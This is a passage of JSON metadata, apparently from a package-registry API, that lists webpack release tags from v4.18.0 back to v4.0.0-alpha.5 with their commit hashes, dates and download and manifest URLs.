ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/w